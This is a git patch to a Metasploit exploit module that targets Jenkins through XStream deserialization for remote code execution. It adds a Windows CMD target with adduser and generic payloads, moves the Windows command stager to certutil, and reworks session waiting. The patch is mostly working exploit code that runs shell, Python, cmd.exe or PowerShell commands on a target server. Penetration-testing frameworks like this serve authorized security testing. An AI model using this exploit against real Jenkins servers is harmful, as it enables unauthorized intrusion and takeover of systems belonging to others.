From 293969599150831e1bf3b0f7cc8798524fa6154d Mon Sep 17 00:00:00 2001
From: attackdebris <attackdebris@gmail.com>
Date: Mon, 26 Feb 2018 16:59:36 -0500
Subject: [PATCH] Add ARCH_CMD and general fixup

---
 .../multi/http/jenkins_xstream_deserialize.rb | 25 +++++++++++++------
 1 file changed, 18 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
index 5f8072ded1..4b6f3472c1 100644
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@@ -47,6 +47,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'Platform'   => 'win',
           'Arch'       => [ARCH_X86, ARCH_X64]
         ],
+        ['Windows (CMD)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_CMD],
+          'Payload' => {
+            'Compat'     => {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'adduser, generic'
+            }
+          }
+        ],
         ['Linux (Dropper)',
           'Platform'   => 'linux',
           'Arch'       => [ARCH_X86, ARCH_X64]
@@ -62,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
       OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
-      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
       Opt::RPORT('8080')
     ])
     deregister_options('URIPATH')
@@ -88,22 +97,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     case target.name
-    when /Unix/, /Python/, /PowerShell/
+    when /Unix/, /Python/, /CMD/
       execute_command(payload.encoded)
+    when /PowerShell/
+      execute_command(payload.encoded)
+      wait_for_session
     else
-      execute_cmdstager
+      execute_cmdstager({:flavor => :certutil})
+      wait_for_session
     end
   end
 
   # Exploit methods
-
   def execute_command(cmd, opts = {})
     cmd = case target.name
     when /Unix/, /Linux/
       %W{/bin/sh -c #{cmd}}
     when /Python/
       %W{python -c #{cmd}}
-    when /Windows/
+    when /Windows/, /CMD/
       %W{cmd.exe /c #{cmd}}
     when /PowerShell/
       psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
@@ -120,10 +132,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'    => 'application/xml',
       'data'     => xstream_payload(cmd)
     )
-    wait_for_powershell_session
   end
 
-  def wait_for_powershell_session
+  def wait_for_session
     print_status "Waiting for exploit to complete..."
     begin
       Timeout.timeout(datastore['ListenerTimeout']) do